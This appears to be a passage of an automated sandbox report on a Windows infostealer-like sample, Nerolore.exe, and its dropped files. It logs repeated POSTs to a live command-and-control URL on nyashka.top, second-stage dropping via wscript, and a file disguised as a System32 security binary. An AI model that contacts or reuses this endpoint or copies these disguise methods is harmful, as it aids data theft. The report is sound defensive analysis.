                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                              Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                              Source: unknownHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyPr8
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000028C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.000000000293C000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.000000000287C000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000028C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWindow created: window name: CLIPBRDWNDCLASS

                              System Summary

                              barindex
                              PE file has nameless sections
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946856 NtQueryInformationProcess,GetSystemInfo,0_2_04946856
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMPJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0494456D0_2_0494456D
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 5_2_00007FF848E90D485_2_00007FF848E90D48
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 5_2_00007FF848E90E435_2_00007FF848E90E43
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 5_2_00007FF84928A82B5_2_00007FF84928A82B
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 5_2_00007FF84928A7AC5_2_00007FF84928A7AC
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 25_2_00007FF848E90D4825_2_00007FF848E90D48
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 25_2_00007FF848E90E4325_2_00007FF848E90E43
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 25_2_00007FF848EA10AF25_2_00007FF848EA10AF
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 25_2_00007FF848EA0E5625_2_00007FF848EA0E56
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 25_2_00007FF848EA000025_2_00007FF848EA0000
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 25_2_00007FF848EA129025_2_00007FF848EA1290
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 27_2_00007FF848E90D4827_2_00007FF848E90D48
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 27_2_00007FF848E90E4327_2_00007FF848E90E43
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 27_2_00007FF848EA10AF27_2_00007FF848EA10AF
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 27_2_00007FF848EA0E5627_2_00007FF848EA0E56
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 27_2_00007FF848EA000027_2_00007FF848EA0000
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 27_2_00007FF848EA129027_2_00007FF848EA1290
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF848E710AF29_2_00007FF848E710AF
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF848E70E5629_2_00007FF848E70E56
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF848E7000029_2_00007FF848E70000
